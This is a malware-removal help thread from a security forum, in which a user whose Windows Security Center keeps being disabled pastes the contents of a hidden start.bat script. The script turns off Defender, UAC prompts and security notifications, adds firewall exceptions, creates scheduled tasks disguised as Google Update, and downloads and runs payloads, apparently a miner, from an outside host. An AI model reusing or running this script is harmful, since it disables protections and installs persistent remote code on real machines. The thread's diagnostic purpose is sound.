Solved Windows Security Center Starting Problem

Status
Not open for further replies.
I

ibrahim.yucel

New Member
Thread author
May 15, 2017
8
Hello,

There is a value on "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer\DisableNotificationCenter" and this is "1". I can delete it but when I restart to PC it comes again.
And also I can start windows security center with manual and then it stops after restart. Attached files which you want.

Thanks for support.
 

Attachments

  • Addition.txt
    162.2 KB · Views: 10
  • FRST.txt
    93.8 KB · Views: 8
TwinHeadedEagle

TwinHeadedEagle

Level 41
Verified
Mar 8, 2013
22,627
Hello,


51a46ae42d560-malwarebytes_anti_malware.png
Scan with Malwarebytes' Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Install the progam and select update.
  • Once updated, click the Settings tab, in the left panel choose Protection and tick Scan for rootkits.
  • Click the Scan tab, choose Threat Scan is checked and click Start Scan.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the Reports tab.
  • Double-click the Scan Log.
  • At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.
 
I

ibrahim.yucel

New Member
Thread author
May 15, 2017
8
Hello,

You can find scanlog file attached.

Thanks for support.
 

Attachments

  • Scanlog.txt
    1.6 KB · Views: 8
I

ibrahim.yucel

New Member
Thread author
May 15, 2017
8
Nothing changes.
Scan with Malwarebytes after restart and it founds 3 items again. When I click the fix, it says these files are deleted but I think can not delete.
 
I

ibrahim.yucel

New Member
Thread author
May 15, 2017
8
Hi,

Actually, I selected "Show hidden folders and files" but I can not see this folder. I tried to access with chrome and I can see. There are some files but I do not know what are they or what do they mean? I attached screenshot.

Thanks.

screen1.PNG screen2.PNG
 
I

ibrahim.yucel

New Member
Thread author
May 15, 2017
8
Hi,

There is a file named "start.bat" on this folder and it is a autoexec file I think. This file including this:


IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
:32BIT
rmdir /S /Q c:\zec
GOTO END
:64BIT
IF EXIST "C:\Windows\System32\nircmd.exe" (GOTO VARE) ELSE (GOTO YOKE)
:YOKE
echo f | xcopy /H /Y "C:\zec\nircmd.exe" "C:\Windows\System32\nircmd.exe"
:VARE
title MyZec
nircmd.exe win hide ititle "MyZec"
killall /F /IM bitsadmin.exe
attrib +s +a +h c:\zec
attrib +s +a +h c:\zec\*
nircmd.exe regsetval dword "HKLM\Software\Policies\Microsoft\Windows Defender" "DisableAntiSpyware" 1
nircmd.exe regsetval dword "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" "ConsentPromptBehaviorAdmin" 0
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "AntiVirusDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "FirewallDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "UpdatesDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "AntiVirusDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "FirewallDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "UpdatesDisableNotify" 1
nircmd.exe regsetval dword "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" "Start" 4
nircmd.exe regsetval dword "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" "DisableNotificationCenter" 1
netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"
netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"
netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"
netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"
SchTasks /Create /SC MINUTE /mo 1 /TN "Google Update" /TR "nircmd.exe exec hide c:\zec\start.bat" /IT /F /RL HIGHEST
SchTasks /Create /SC HOURLY /TN "GoogleUpdate" /TR "nircmd.exe exec hide c:\zec\start.bat" /IT /F /RL HIGHEST
tasklist /FI "IMAGENAME eq taskmgr.exe" 2>NUL | find /I /N "taskmgr.exe">NUL
IF "%ERRORLEVEL%" EQU "1" (
Bitsadmin.exe /cache /clear
Bitsadmin.exe /transfer "MyZec" http://guardia.us/MyZec.txt C:\zec\config.txt
Bitsadmin.exe /transfer "MyZec2" http://guardia.us/MyZec2.txt C:\zec\config2.bat
nircmd.exe exec hide c:\zec\config2.bat
nircmd.exe exec hide c:\zec\taskmgr.exe
)
tasklist /FI "IMAGENAME eq taskmgr.exe" 2>NUL | find /I /N "taskmgr.exe">NUL
IF "%ERRORLEVEL%" EQU "1" (
tasklist /FI "IMAGENAME eq svchosts.exe" 2>NUL | find /I /N "svchosts.exe">NUL
IF "%ERRORLEVEL%" EQU "1" (
Bitsadmin.exe /transfer "MyXmr" http://guardia.us/MyXmr.txt C:\zec\MyXmr.bat
nircmd.exe exec hide c:\zec\MyXmr.bat
)
)
nircmd.exe win close ititle "MyZec"
:END


I think problem is here. Should I delete this folder completely?
 
TwinHeadedEagle

TwinHeadedEagle

Level 41
Verified
Mar 8, 2013
22,627
We'll do it by using FRST. It will take care of everything:


FRST.gif
Fix with Farbar Recovery Scan Tool

icon_exclaim.gif
This fix was created for this user for use on that particular machine.
icon_exclaim.gif

icon_exclaim.gif
Running it on another one may cause damage and render the system unstable.
icon_exclaim.gif

Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on
    FRST.gif
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finishes FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.
 

Attachments

  • fixlist.txt
    104 KB · Views: 14
Status
Not open for further replies.

Similar threads

L
    • Like
Question Disable 3rd party AV registration in windows security center
Replies
5
Views
376
Other security for Windows, Mac, Linux
bazang
bazang
Gandalf_The_Grey
    • Like
    • +Reputation
    • Applause
New Update KB5041587 is out for Windows 11 22H2 and 23H2 with File Explorer improvements and more
Replies
7
Views
662
Windows 11
Gandalf_The_Grey
Gandalf_The_Grey
Gandalf_The_Grey
Security News QNAP adds NAS ransomware protection to latest QTS version
Replies
0
Views
1,526
Security News
Gandalf_The_Grey
Gandalf_The_Grey

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top